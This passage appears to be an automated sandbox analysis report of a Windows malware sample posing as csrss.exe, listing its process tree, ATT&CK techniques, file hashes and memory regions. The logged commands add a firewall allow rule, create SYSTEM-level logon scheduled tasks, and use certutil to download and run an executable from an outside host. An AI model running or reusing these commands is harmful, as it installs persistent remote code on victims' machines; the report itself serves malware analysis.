C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 576
3⤵
- Program crash
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 668
3⤵
- Program crash
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 668
3⤵
- Program crash
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 704
3⤵
- Program crash
PID:4288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 712
3⤵
- Program crash
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 732
3⤵
- Program crash
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 728
3⤵
- Program crash
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 700
3⤵
- Program crash
PID:4644

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
PID:1228

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 328
4⤵
- Program crash
PID:2764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 332
4⤵
- Program crash
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 332
4⤵
- Program crash
PID:2420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 656
4⤵
- Program crash
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 656
4⤵
- Program crash
PID:4356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 656
4⤵
- Program crash
PID:4020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 656
4⤵
- Program crash
PID:228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 744
4⤵
- Program crash
PID:5048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 760
4⤵
- Program crash
PID:2012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 600
4⤵
- Program crash
PID:4052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 876
4⤵
- Program crash
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 892
4⤵
- Program crash
PID:4608

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:3916

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 892
4⤵
- Program crash
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 988
4⤵
- Program crash
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1016
4⤵
- Program crash
PID:1084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 912
4⤵
- Program crash
PID:1012

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 948
4⤵
- Program crash
PID:2352

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
PID:1500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1504
4⤵
- Program crash
PID:672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1520
4⤵
- Program crash
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1592
4⤵
- Program crash
PID:2564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1544
4⤵
- Program crash
PID:640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1012
4⤵
- Program crash
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1492
4⤵
- Program crash
PID:2160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1556
4⤵
- Program crash
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1464
4⤵
- Program crash
PID:1312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 980
4⤵
- Program crash
PID:4328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1652
4⤵
- Program crash
PID:3428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4828 -ip 4828
1⤵
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4828 -ip 4828
1⤵
PID:2836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4828 -ip 4828
1⤵
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4828 -ip 4828
1⤵
PID:392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4828 -ip 4828
1⤵
PID:2360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4828 -ip 4828
1⤵
PID:4296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4828 -ip 4828
1⤵
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4828 -ip 4828
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4828 -ip 4828
1⤵
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4828 -ip 4828
1⤵
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4828 -ip 4828
1⤵
PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4828 -ip 4828
1⤵
PID:1860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4828 -ip 4828
1⤵
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4828 -ip 4828
1⤵
PID:1180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4828 -ip 4828
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4828 -ip 4828
1⤵
PID:4916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4828 -ip 4828
1⤵
PID:3780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4828 -ip 4828
1⤵
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4828 -ip 4828
1⤵
PID:2140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3156 -ip 3156
1⤵
PID:3772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3156 -ip 3156
1⤵
PID:1504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3156 -ip 3156
1⤵
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3156 -ip 3156
1⤵
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3156 -ip 3156
1⤵
PID:1296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3156 -ip 3156
1⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3156 -ip 3156
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3156 -ip 3156
1⤵
PID:1312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3156 -ip 3156
1⤵
PID:2508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3156 -ip 3156
1⤵
PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3156 -ip 3156
1⤵
PID:1472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5092 -ip 5092
1⤵
PID:768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5092 -ip 5092
1⤵
PID:4272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5092 -ip 5092
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5092 -ip 5092
1⤵
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5092 -ip 5092
1⤵
PID:4128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5092 -ip 5092
1⤵
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5092 -ip 5092
1⤵
PID:3740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5092 -ip 5092
1⤵
PID:3516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5092 -ip 5092
1⤵
PID:2648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5092 -ip 5092
1⤵
PID:4344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5092 -ip 5092
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5092 -ip 5092
1⤵
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5092 -ip 5092
1⤵
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5092 -ip 5092
1⤵
PID:1120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5092 -ip 5092
1⤵
PID:1272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5092 -ip 5092
1⤵
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5092 -ip 5092
1⤵
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5092 -ip 5092
1⤵
PID:3784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5092 -ip 5092
1⤵
PID:5068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5092 -ip 5092
1⤵
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5092 -ip 5092
1⤵
PID:3020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5092 -ip 5092
1⤵
PID:3304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5092 -ip 5092
1⤵
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5092 -ip 5092
1⤵
PID:828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5092 -ip 5092
1⤵
PID:3368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5092 -ip 5092
1⤵
PID:2928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5092 -ip 5092
1⤵
PID:4604

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
de8c59730bb0557ef92f004b1fe2eecf

SHA1
334a2f8d11a7aa7309f31fe56555baf49ae7d1f9

SHA256
23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b

SHA512
47dcacfd705a02b24d32993aecc01f08c699c0363029885865ad4ae482b5103c363c4c3c84f41d7749ebe3ccb2c505ac73e30542c7ac8ef0de0ac6834fc851ee

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
de8c59730bb0557ef92f004b1fe2eecf

SHA1
334a2f8d11a7aa7309f31fe56555baf49ae7d1f9

SHA256
23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b

SHA512
47dcacfd705a02b24d32993aecc01f08c699c0363029885865ad4ae482b5103c363c4c3c84f41d7749ebe3ccb2c505ac73e30542c7ac8ef0de0ac6834fc851ee

Download Submit
memory/812-151-0x0000000000000000-mapping.dmp

Download
memory/1228-140-0x0000000000000000-mapping.dmp

Download
memory/1500-149-0x0000000000000000-mapping.dmp

Download
memory/2152-139-0x0000000000000000-mapping.dmp

Download
memory/3156-144-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/3156-135-0x0000000000000000-mapping.dmp

Download
memory/3156-137-0x0000000000FBA000-0x0000000001362000-memory.dmp

Filesize
3.7MB

Download
memory/3156-138-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/3916-148-0x0000000000000000-mapping.dmp

Download
memory/4016-147-0x0000000000000000-mapping.dmp

Download
memory/4828-132-0x0000000000FA5000-0x000000000134D000-memory.dmp

Filesize
3.7MB

Download
memory/4828-136-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/4828-134-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/4828-133-0x0000000001350000-0x0000000001B54000-memory.dmp

Filesize
8.0MB

Download
memory/5092-145-0x0000000001400000-0x00000000017A8000-memory.dmp

Filesize
3.7MB

Download
memory/5092-146-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/5092-141-0x0000000000000000-mapping.dmp

Download
memory/5092-152-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads